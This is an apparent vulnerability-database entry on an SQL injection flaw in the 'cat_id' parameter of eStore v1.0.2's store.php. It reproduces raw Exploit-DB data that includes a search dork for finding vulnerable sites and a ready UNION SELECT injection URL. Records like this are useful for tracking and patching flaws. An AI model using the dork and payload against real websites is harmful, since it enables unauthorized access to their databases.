Powered by eStore v1.0.2

vendor:

eStore

by:

R3VAN_BASTARD

CVSS

HIGH

SQL Injection

CWE

Product Name: eStore

Affected Version From: eStore v1.0.2

Affected Version To: eStore v1.0.2

Patch Exists: YES

Related CWE: N/A

CPE: cpe:a:estore:estore:1.0.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

The vulnerability exists in the eStore v1.0.2 web application due to improper sanitization of user-supplied input in the 'cat_id' parameter of the 'store.php' script. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in application's database.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

=====================================================================================================
                                         .::Powered by eStore v1.0.2::.
=====================================================================================================
[x] Author     : R3VAN_BASTARD
[x] Web      : www.sux0r.net
[x] Download: http://brooky.com (RIP)
=====================================================================================================
Dork: intext:"Powered by eStore v1.0.2"

Exploite: /path/store.php?cat_id=00+AND+1=2+UNION+SELECT+[SQLi],2,3,4,5,6,7,8,9,10,11,12,13,14,15--

=====================================================================================================
Salam Hangat:
VALENCIA : S3TAN : YOGA0400 : VRS-HCK : JACK : MADONK : EMINEM : OON BOY : HANTU
YUDIS TIRA SUMANTRI : KECEMPLUNG-KALEN : DECLINED : JAROMIL ROJO :COZZY NET
JUPE NET : MAINHACK : SERVER IS DOWN